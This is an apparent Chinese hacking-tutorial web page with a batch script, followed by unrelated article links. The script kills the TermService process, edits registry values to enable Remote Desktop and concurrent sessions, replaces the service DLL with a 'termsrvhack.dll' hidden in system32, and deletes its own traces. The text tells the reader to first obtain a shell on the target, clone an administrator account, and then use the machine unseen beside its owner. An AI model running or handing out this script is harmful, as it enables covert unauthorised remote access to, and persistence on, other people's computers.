@ntsd -c q -p "pid"
@reg add HKLMSOFTWAREMicrosoftWindows" "NTCurrentVersionWinlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@reg add HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@reg add HKLMSYSTEMCurrentControlSetcontrolterminal" "serverLicensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@reg add HKLMSYSTEMCurrentControlSetServicesTermServiceParameters /v serviceDll /t REG_EXPAND_SZ /d %SystemRoot%system32termsrvhack.dll /f
@copy c:termsrvhack.dll c:windowssystem32dllcachetermsrvhack.dll
@attribhsr c:windowssystem32dllcachetermsrvhack.dll
@copy c:termsrvhack.dll c:windowssystem32termsrvhack.dll
@attribhsr c:windowssystem32termsrvhack.dll
@shutdown -a
@del c:termsrvhack.dll
@net start termservice
@del c:3389.bat
其中“pid”是要替换成TermService服务的PID号,可以用命令tasklist/svc命令得到 。当然win2000和以下系统是没有tasklist命令的 。
具体的操作方法是:先要得到对方的一个SHELL,然后在shell下用第三方软件打开终端服务,先不要改变默认的3389端口,不然要重起后才登陆,再建一个或克隆一个超级管理员用户 。
接下来把下载好的termsrvhack.dll和上面的批处理传到对方的C盘根目录下,然后在shell下运行此批处理 。提示成功!
最后打开登陆器,3389终端登陆!
说明一下你登陆进去后在里面的操作和那台电脑的主人操作是互不影响的,他玩他的,你玩你的,呵呵,爽伐?!
推荐阅读
- 轻快pdf阅读器怎么实现电脑手机互传文件?电脑手机互传文件操作方法分享
- 将XP与Vista装在同一分区 且XP不中毒
- Windows XP操作系统中隐藏的20个秘密
- win10取消打开文件出现“在商店中查找应用”窗口提示的方法
- 什么样的屋顶容易在大风中受损
- 用Sysprep自动实现Windows XP成功部署
- 电机没劲是什么原因
- 有鸟中熊猫之称的是
- 途有饿殍而不知发中发的意思
- Windwos XP系统中把鼠标玩出新花样